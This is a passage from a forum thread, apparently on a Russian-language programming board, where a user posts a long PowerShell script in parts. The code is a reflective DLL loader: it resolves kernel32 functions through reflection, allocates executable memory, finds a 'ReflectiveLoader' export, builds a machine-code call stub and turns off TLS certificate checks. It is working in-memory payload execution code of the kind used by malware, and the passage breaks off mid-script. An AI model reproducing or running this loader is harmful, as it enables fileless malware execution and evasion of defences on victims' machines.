        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)
        $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
        $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null
        $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64
        
    #Struct IMAGE_NT_HEADERS32
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)
        $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
        $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null
        $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32
 
        #Struct IMAGE_DOS_HEADER
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)
        $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null
 
        $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')
        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
        $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $Construct
orValue, $FieldArray, @([Int32] 4))
        $e_resField.SetCustomAttribute($AttribBuilder)
 
        $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null
 
        $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')
        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $Construct
orValue, $FieldArray, @([Int32] 10))
        $e_res2Field.SetCustomAttribute($AttribBuilder)
 
        $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null
        $IMAGE_DOS_HEADER = $TypeBuilder.CreateType()   
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER
 
    #Struct IMAGE_SECTION_HEADER
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)
 
        $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')
        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $Construct
orValue, $FieldArray, @([Int32] 8))
        $nameField.SetCustomAttribute($AttribBuilder)
 
        $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
        $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEA
DER
 
        #Struct IMAGE_EXPORT_DIRECTORY
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40
)
        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null
        $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DI
RECTORY
 
        return $Win32Types
    }
 
  Function Get-Win32Constants
    {
        $Win32Constants = New-Object System.Object
        
        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40
        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name WAIT_TIMEOUT -Value 0x102
        
        return $Win32Constants
    }
0
bliver
1 / 1 / 0
Регистрация: 15.08.2017
Сообщений: 13
04.12.2017, 18:48  [ТС] 7
продолжение скрипта
Bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
Function Is-Win64() 
  {
    return [IntPtr]::size -eq 8
  }
 
  Function Get-ProcAddress 
  {
      Param 
      (
          [Parameter(Position = 0, Mandatory = $True)] [String] $Module,
          [Parameter(Position = 1, Mandatory = $True)] [String] $Procedure
      )
 
      $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
          Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
      $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
      $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
      $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
      $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
      $tmpPtr = New-Object IntPtr
      $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
      return $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Proc
edure))
  }
 
  Function Get-DelegateType
  {
      Param
      (
          [OutputType([Type])]
          [Parameter( Position = 0)]
          [Type[]]
          $Parameters = (New-Object Type[](0)),
          [Parameter( Position = 1 )]
          [Type]
          $ReturnType = [Void]
      )
 
      $Domain = [AppDomain]::CurrentDomain
      $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
      $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBui
lderAccess]::Run)
      $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
      $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, Auto
Class', [System.MulticastDelegate])
      $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.R
eflection.CallingConventions]::Standard, $Parameters)
      $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
      $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $Retur
nType, $Parameters)
      $MethodBuilder.SetImplementationFlags('Runtime, Managed')
        
      Write-Output $TypeBuilder.CreateType()
  }
 
  Function Get-NeccessaryFuncs
  {
      $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
      $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [Int], [Int], [Int]) ([IntPtr])
      $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAlloc
Addr, $VirtualAllocDelegate)
    $Win32Funcs | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc
      #
      $CreateThreadAddr = Get-ProcAddress kernel32.dll CreateThread
      $CreateThreadDelegate = Get-DelegateType @([IntPtr], [Int], [IntPtr], [IntPtr], [Int], [IntPtr]) ([In
tPtr])
      $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThread
Addr, $CreateThreadDelegate)
    $Win32Funcs | Add-Member NoteProperty -Name CreateThread -Value $CreateThread
      #
      $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject
      $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [Int]) ([Int])
      $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitF
orSingleObjectAddr, $WaitForSingleObjectDelegate)
    $Win32Funcs | Add-Member NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject
    #
    $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
      $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [Uint32], [UInt32]) ([Bool])
      $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAd
dr, $VirtualFreeDelegate)
    $Win32Funcs | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree
    #
    $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA
    $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])
    $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModul
eHandleAddr, $GetModuleHandleDelegate)
    $Win32Funcs | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle
    #
    $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress
    $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])
    $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAd
dressAddr, $GetProcAddressDelegate)
    $Win32Funcs | Add-Member NoteProperty -Name GetProcAddress -Value $GetProcAddress
    #
    $TerminateThreadAddr = Get-ProcAddress kernel32.dll TerminateThread
    $TerminateThreadDelegate = Get-DelegateType @([IntPtr], [Uint32]) ([Bool])
    $TerminateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($Terminat
eThreadAddr, $TerminateThreadDelegate)
    $Win32Funcs | Add-Member NoteProperty -Name TerminateThread -Value $TerminateThread
  }
 
  Function Copy-ToUnmanagedMem
  {
      Param 
      (
          [Parameter(Position = 0, Mandatory = $True)] [IntPtr] $UnmagedMemPointer,
          [Parameter(Position = 1, Mandatory = $True)] [Byte[]] $ByteArr,
          [Parameter(Position = 2, Mandatory = $True)] [Int] $UnmagedStartInd,
          [Parameter(Position = 3, Mandatory = $True)] [Int] $Size
      )
      for ($i = 0; $i -lt $Size; $i++)
      {
          [System.Runtime.InteropServices.Marshal]::WriteByte($UnmagedMemPointer, $i + $UnmagedStartInd, $Byte
Arr[$i])
      }
  }
 
  Function Convert-RVA2Offset([IntPtr]$Rva)
  {
    if ($PE64Bit)
    {
      $FirstSectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$NtHeadersPtr) ([System.Runtime.
InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))
    }
    else
    {
      $FirstSectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$NtHeadersPtr) ([System.Runtime.
InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))
    }
    #
    $FirstSectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FirstSectionHeaderPt
r, [Type]$Win32Types.IMAGE_SECTION_HEADER)
    #
    if ($Rva.ToInt64() -lt $FirstSectionHeader.PointerToRawData)
    {
      return $Rva
    }
    #
    for( $i = 0; $i -lt $NtHeadersInfo.FileHeader.NumberOfSections; $i++)
        {
            $SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$FirstSectionHeaderPtr) ($i * [System.Ru
ntime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
            $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$W
in32Types.IMAGE_SECTION_HEADER)
      if (($Rva.ToInt64() -ge $SectionHeader.VirtualAddress) -and ($Rva.ToInt64() -lt (Add-SignedIntAsUn
signed $SectionHeader.VirtualAddress $SectionHeader.SizeOfRawData)))
      {
        return Add-SignedIntAsUnsigned (Sub-SignedIntAsUnsigned $Rva $SectionHeader.VirtualAddress) $Sec
tionHeader.PointerToRawData
      }
        }
       
    return $null
  }
 
  Function Add-SignedIntAsUnsigned
    {
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [Int64]
        $Value1,
        
        [Parameter(Position = 1, Mandatory = $true)]
        [Int64]
        $Value2
        )
        
        [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
        [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
        [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
 
        if ($Value1Bytes.Count -eq $Value2Bytes.Count)
        {
            $CarryOver = 0
            for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
            {
                #Add bytes
                [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver
 
                $FinalBytes[$i] = $Sum -band 0x00FF
                
                if (($Sum -band 0xFF00) -eq 0x100)
                {
                    $CarryOver = 1
                }
                else
                {
                    $CarryOver = 0
                }
            }
        }
        else
        {
            Throw "Cannot add bytearrays of different sizes"
        }
        
        return [BitConverter]::ToInt64($FinalBytes, 0)
    }
 
  Function Sub-SignedIntAsUnsigned
    {
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [Int64]
        $Value1,
        
        [Parameter(Position = 1, Mandatory = $true)]
        [Int64]
        $Value2
        )
        
        [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
        [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
        [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
 
        if ($Value1Bytes.Count -eq $Value2Bytes.Count)
        {
            $CarryOver = 0
            for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
            {
                $Val = $Value1Bytes[$i] - $CarryOver
                #Sub bytes
                if ($Val -lt $Value2Bytes[$i])
                {
                    $Val += 256
                    $CarryOver = 1
                }
                else
                {
                    $CarryOver = 0
                }
                
                
                [UInt16]$Sum = $Val - $Value2Bytes[$i]
 
                $FinalBytes[$i] = $Sum -band 0x00FF
            }
        }
        else
        {
            Throw "Cannot subtract bytearrays of different sizes"
        }
        
        return [BitConverter]::ToInt64($FinalBytes, 0)
    }
 
  Function Get-MemoryProcAddress
    {
        Param
    (
        [Parameter(Position = 0, Mandatory = $true)] [IntPtr]   $PEHandle,
        [Parameter(Position = 1, Mandatory = $true)] [String[]] $FunctionsNames
        )
        
        $Win32Types = Get-Win32Types
        $Win32Constants = Get-Win32Constants
    $PE64Bit = $null
    $NtHeadersInfo = $null
    ###
    #ImageNtHeaders
    $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.I
MAGE_DOS_HEADER)
    $NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfa
new))
    $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$W
in32Types.IMAGE_NT_HEADERS64)
    #
    if ($imageNtHeaders64.Signature -ne 0x00004550)
      {
          throw "Invalid IMAGE_NT_HEADER signature."
      }
    #
    if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')
        {
            $NtHeadersInfo = $imageNtHeaders64
            $PE64Bit = $true
        }
        else
        {
            $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Wi
n32Types.IMAGE_NT_HEADERS32)
            $NtHeadersInfo = $imageNtHeaders32
            $PE64Bit = $false
        }
    #
    if (($NtHeadersInfo.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -ne $Win32Const
ants.IMAGE_FILE_DLL)
        {
            Throw "PE file is not a DLL"
        }
    if (((Is-Win64) -and -not $PE64Bit) -or (-not (Is-Win64) -and $PE64Bit))
    {
      Throw "DLL file bitness and powershell process bitness not the same"
    }
    ####
    $FunctionsAddrss = New-Object IntPtr[] @($FunctionsNames).length
    ####
        if ($NtHeadersInfo.OptionalHeader.ExportTable.Size -eq 0)
        {
            return [IntPtr]::Zero
        }
    $ExportTablePtr = $NtHeadersInfo.OptionalHeader.ExportTable.VirtualAddress
    $ExportTableAddr = Add-SignedIntAsUnsigned ($PEHandle) (. Convert-RVA2Offset $ExportTablePtr)
    if (-not $ExportTableAddr)
    {
      Throw "Can't find Export Table address"
    }
    #
        $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTableAddr, [Type]$Win32
Types.IMAGE_EXPORT_DIRECTORY)
        for ($Ind = 0; $Ind -lt $ExportTable.NumberOfNames; $Ind++)
        {
      $currOffset = . Convert-RVA2Offset (Add-SignedIntAsUnsigned $ExportTable.AddressOfNames  ($Ind * 4
))
            $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($currOffset)
            $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) (. Convert-RVA2Offset ([System.Runtime.InteropServices
.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32])))
      #"NamePtr - 0x{0:X0}" -f $NamePtr | Write-Host
            $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr)
      for ($NameInd = 0; $NameInd -lt @($FunctionsNames).length; $NameInd++)
      {
        $FunctionName = @($FunctionsNames)[$NameInd]
              if ($Name -match ".*?$FunctionName.*")
              {
                  $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) (. Convert-RVA2Offset ($ExportTable.AddressOfNam
eOrdinals + ($Ind * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))))
                  $FuncIndex = . Convert-RVA2Offset ([System.Runtime.InteropServices.Marshal]::PtrToStructure($Ordin
alPtr, [Type][UInt16]))
                  $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) (. Convert-RVA2Offset ($ExportTable.AddressO
fFunctions + ($FuncIndex.ToInt32() * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32]))))
                  $FuncOffset =  . Convert-RVA2Offset ([System.Runtime.InteropServices.Marshal]::PtrToStructure($Fun
cOffsetAddr, [Type][UInt32]))
                  $FunctionsAddrss[$NameInd] = Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset)
              }
      }
        }
        
        return $FunctionsAddrss
    }
 
  Function Generate-Bootstrap
  {
    Param
    (
      [Parameter(Position = 0, Mandatory = $True)] [HashTable]  $Opts
    )
    Function Local:ConvertTo-LittleEndian ([IntPtr] $Address, [Int] $Size = 0)
    {
      $LittleEndianByteArray = New-Object Byte[](0)
      $Address.ToString("X$(@{$True=[IntPtr]::size * 2; $False=$Size * 2}[$Size -eq 0])") -split '([A-F0
-9]{2})' | ForEach-Object { if ($_) { $LittleEndianByteArray += [Byte] ('0x{0}' -f $_)} }
      [System.Array]::Reverse($LittleEndianByteArray)
      Write-Output $LittleEndianByteArray
    }
 
    $CallStub = New-Object Byte[](0)
 
    if (Is-Win64)
    {
      [Byte[]] $CallStub = 0x68 #push userDataSize
      $CallStub += ConvertTo-LittleEndian $Opts.UserDataSize 4 # userDataSize
      $CallStub += 0x48, 0x83, 0xEC, 0x20 #sub rsp, 0x20
      $CallStub += 0x48, 0xB9 #mov rcx, lpParam
      $CallStub += ConvertTo-LittleEndian $Opts.LpParam # lpParam
      $CallStub += 0x48, 0xBA #mov rdx, &imageBase
      $CallStub += ConvertTo-LittleEndian $Opts.ImageBaseAddr # &imageBase
      $CallStub += 0x41, 0xB8 #mov r8d, &funcHash
      $CallStub += ConvertTo-LittleEndian $Opts.FuncHash 4 # &funcHash
      $CallStub += 0x49, 0xB9 #mov r9, &userData
      $CallStub += ConvertTo-LittleEndian $Opts.UserDataAddr # &userData
      $CallStub += 0x48, 0xB8 #mov rax, &reflectLoader
      $CallStub += ConvertTo-LittleEndian $Opts.ReflectLoaderAddr # &reflectLoader
      $CallStub += 0xFF, 0xD0 #call rax
      $CallStub += 0x48, 0x89, 0xC1 #mov rcx, rax (return code from ReflectiveLoader)
      $CallStub += 0x48, 0xB8 #mov rax, &exitThread
      $CallStub += ConvertTo-LittleEndian $Opts.ExitThreadAddr # &exitThread
      $CallStub += 0xFF, 0xD0 #call rax
    }
    else
    {
      [Byte[]] $CallStub = 0x68 #push userDataSize
      $CallStub += ConvertTo-LittleEndian $Opts.UserDataSize # userDataSize
      $CallStub += 0x68 #push &userData
      $CallStub += ConvertTo-LittleEndian $Opts.UserDataAddr # &userData
      $CallStub += 0x68 #push funcHash
      $CallStub += ConvertTo-LittleEndian $Opts.FuncHash # &funcHash
      $CallStub += 0x68 #push &imageBase
      $CallStub += ConvertTo-LittleEndian $Opts.ImageBaseAddr # &imageBase
      $CallStub += 0x68 #push lpParam
      $CallStub += ConvertTo-LittleEndian $Opts.LpParam # lpParam     
      $CallStub += 0xB8 #mov eax, &reflectLoader
      $CallStub += ConvertTo-LittleEndian $Opts.ReflectLoaderAddr # &reflectLoader
      $CallStub += 0xFF, 0xD0 #call eax
      $CallStub += 0x50 #push eax (return code from ReflectiveLoader)
      $CallStub += 0xB8 #mov eax, &exitThread
      $CallStub += ConvertTo-LittleEndian $Opts.ExitThreadAddr # &exitThread
      $CallStub += 0xFF, 0xD0 #call eax
    }
    $CallStub
  }
 
  Function Get-FunctionHash
  {
    Param
    (
      [Parameter(Position = 0, Mandatory = $True)] [string] $FuncName
    )
    function Local:bitshift 
    {
      Param
      (
        [Parameter(Mandatory = $True, Position=0)] [Int64] $x,
        [Parameter(ParameterSetName='Left')] [Int64] $Left,
        [Parameter(ParameterSetName='Right')] [Int64] $Right
      ) 
 
      $shift = if($PSCmdlet.ParameterSetName -eq 'Left')
      { 
          $Left
      }
      else
      {
          -$Right
      }
 
      return [math]::Floor($x * [math]::Pow(2, $shift))
    }
    Function Local:ror ($val, $r_bits, $max_bits) 
    {
      return ((bitshift ($val -band ([math]::Pow(2, $max_bits) - 1)) -Right ($r_bits % $max_bits)) -bor 
(bitshift $val -Left ($max_bits-($r_bits % $max_bits))) -band ([math]::Pow(2, $max_bits) - 1))
    }
 
    [Int64] $hash = 0
    
    for ($chNum = 0; $chNum -lt $FuncName.Length; $chNum++)
    { 
      $hash = ror $hash $HASH_KEY 32
      $hash += [Int32] $FuncName[$chNum]
    }
    $hash
  }
 
  #allow self-signed certs
  [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
  #
  . Get-NeccessaryFuncs
  #
  $dllData = $arrexp
  
  try
  {
    if ($decFunc)
    {
      $dllData = $decFunc.Invoke($dllData, $decParams)
    }
    #
    $Win32Const = Get-Win32Constants
    $UserDataSize = @{$True=8; $False=4}[(Is-Win64)]
    #
    $AllocatedMemSize = [Math]::Max($dllData.Length + $UserDataSize + 1 + $BOOTSTRAP_MAX_LENGTH, 0x1000)
    [IntPtr]$PEHandle = $Win32Funcs.VirtualAlloc.Invoke([IntPtr]::Zero, $AllocatedMemSize, ($Win32Const.
MEM_COMMIT -bor $Win32Const.MEM_RESERVE), $Win32Const.PAGE_EXECUTE_READWRITE)
    Copy-ToUnmanagedMem $PEHandle $dllData 0 $dllData.Length
    #
    $FuncAddr, $ReflectLoaderAddr = Get-MemoryProcAddress $PEHandle @($funcName, "ReflectiveLoader")
    if ($funcAddr -eq 0)
    {
     # Throw "Function '$funcName' not found in DLL export table!"
    }
    if ($ReflectLoaderAddr -eq 0)
    {
      Throw "Function 'ReflectiveLoader' not found in DLL export table!"
    }
    #
    
    
    $BootstrapOpts = @{
      UserDataSize = $UserDataSize;
      UserDataAddr = [Int64]$PEHandle + $dllData.Length;
      ImageBaseAddr = $PEHandle;
      FuncHash = Get-FunctionHash $funcName;
      LpParam = 0;
      LpParamPass = [Int64]$PEHandle + $dllData.Length + $UserDataSize;
      ReflectLoaderAddr = $ReflectLoaderAddr;
      ExitThreadAddr = $Win32Funcs.GetProcAddress.Invoke($Win32Funcs.GetModuleHandle.Invoke("kernel32.dl
l"), "ExitThread");
    }
    #
    
    $Bootsrap = Generate-Bootstrap $BootstrapOpts
    $BootstrapAddr = [Int64]$PEHandle + $dllData.Length + $UserDataSize + 1
    if ($DEBUG)
    {
      Write-Host ($BootstrapOpts | Out-String)
      Write-Host "Bootstrap size - ", $Bootsrap.Length
      Write-Host $Bootsrap
    }
